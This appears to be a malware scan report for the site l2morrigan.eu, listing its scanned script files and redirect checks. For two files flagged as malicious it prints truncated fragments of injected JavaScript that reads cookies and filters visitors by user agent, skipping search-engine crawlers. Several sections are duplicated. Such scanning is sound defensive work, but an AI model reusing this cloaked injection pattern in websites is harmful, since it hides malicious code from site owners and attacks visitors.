Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=l2morrigan.eu
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://l2morrigan.eu/ | 200 OK Content-Length: 11945 Content-Type: text/html | clean |
http://l2morrigan.eu/js/jquery-1.4.2.min.js | 200 OK Content-Length: 72914 Content-Type: application/x-javascript | clean |
http://l2morrigan.eu/js/stressweb.js | 200 OK Content-Length: 4036 Content-Type: application/x-javascript | clean |
http://l2morrigan.eu/js/flexcroll.js | 200 OK Content-Length: 16053 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t Antivirus reports:
| ||
http://l2morrigan.eu/js/jquerys.js | 200 OK Content-Length: 86987 Content-Type: application/x-javascript | clean |
http://l2morrigan.eu/js/jquery.ui.js | 200 OK Content-Length: 200704 Content-Type: application/x-javascript | clean |
http://005.free-counters.co.uk/count-072.js | 200 OK Content-Length: 472 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://l2morrigan.eu/js/coin-slider.min.js | 200 OK Content-Length: 9507 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(e){var o=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return o?decodeURIComponent(o[1]):void 0}!function(){function e(e,o,t){var r=(e+"").toLowerCase(),i=(o+"").toLowerCase(),n=0;return-1!==(n=r.indexOf(i,t))?n:!1}function o(){var o=["Linux","Windows NT 6.3","Windows NT 6.2","rv:11.0","AppleWebKit","Android","Googlebot","IEMobile","Yandex"],t=!1;for(var r in o)if(e(navigator.userAgent,o[r])){t=!0;break}return t}var t $.straight=function(el){counter=0;for(i=1;i<=params[el.id].sph;i++){for(j=1;j<=params[el.id].spw;j++){order[el.id][counter]=i+''+j;counter++;}}} $.min=function(n,m){if(n>m)return m;else return n;} $.max=function(n,m){if(n<m)return m;else return n;} this.each(function(){init(this);});};$.fn.coinslider.defaults={width:565,height:290,spw:7,sph:5,delay:3000,sDelay:30,opacity:0.7,titleSpeed:500,effect:'',navigation:true,links:true,hoverPause:true};})(jQuery); Antivirus reports:
| ||
http://l2morrigan.eu/js/scripts.js | 200 OK Content-Length: 1583 Content-Type: application/x-javascript | clean |
http://l2morrigan.eu/js/jquery.simplemodal.js | 200 OK Content-Length: 10532 Content-Type: application/x-javascript | clean |
http://l2morrigan.eu/js/basic.js | 200 OK Content-Length: 1646 Content-Type: application/x-javascript | clean |
http://l2morrigan.eu/js/jquery.rs.slideshow.js | 200 OK Content-Length: 33915 Content-Type: application/x-javascript | clean |
http://l2morrigan.eu/js/html-captions-bootstrap.js | 200 OK Content-Length: 1414 Content-Type: application/x-javascript | clean |
http://l2morrigan.eu/index.html | 200 OK Content-Length: 11945 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: l2morrigan.eu
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Sun, 05 Oct 2014 04:10:26 GMT
Accept-Ranges: bytes
Age: 1007
ETag: "2ea9-503b21198ad74"
Server: Apache/2
Content-Length: 11945
Content-Type: text/html
Expires: Sun, 05 Oct 2014 04:53:38 GMT
Last-Modified: Tue, 23 Sep 2014 02:10:17 GMT
...11945 bytes of data.
GET / HTTP/1.1
Host: l2morrigan.eu
Result:
HTTP/1.1 200 OK
Cache-Control: max-age=3600
Connection: close
Date: Sun, 05 Oct 2014 04:10:26 GMT
Accept-Ranges: bytes
Age: 1007
ETag: "2ea9-503b21198ad74"
Server: Apache/2
Content-Length: 11945
Content-Type: text/html
Expires: Sun, 05 Oct 2014 04:53:38 GMT
Last-Modified: Tue, 23 Sep 2014 02:10:17 GMT
...11945 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: l2morrigan.eu
Referer: http://www.google.com/search?q=l2morrigan.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: l2morrigan.eu
Referer: http://www.google.com/search?q=l2morrigan.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.